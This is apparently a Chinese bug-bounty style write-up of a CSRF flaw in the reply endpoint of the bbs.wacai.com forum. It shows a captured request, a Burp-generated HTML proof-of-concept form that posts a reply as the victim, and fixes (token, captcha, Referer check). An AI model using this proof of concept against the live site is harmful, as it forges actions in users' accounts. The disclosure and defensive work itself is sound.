钱堂评论处存在Csrf

漏洞挖掘

漏洞复现

1、打开Url：https://bbs.wacai.com/web/thread/9666092

2、点击回复并且抓包，抓取的数据包如下

POST /web/api/reply/add HTTP/1.1
Host: bbs.wacai.com
Connection: close
Content-Length: 50
Accept: application/json, text/javascript
Origin: https://bbs.wacai.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://bbs.wacai.com/web/thread/9666092
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: 马赛克
tid=9666092&message=%3Cdiv%3Ecsrf_test%3C%2Fdiv%3E

3、没有token，并且没有对referer做限制，直接构造为poc

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://bbs.wacai.com/web/api/reply/add" method="POST">
      <input type="hidden" name="tid" value="9666092" />
      <input type="hidden" name="message" value="&lt;div&gt;csrf&#95;test&lt;&#47;div&gt;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

4、在浏览器处打开Poc

ok，回复成功

修复方案

1、加上Token验证
2、加上验证码
3、限制Referer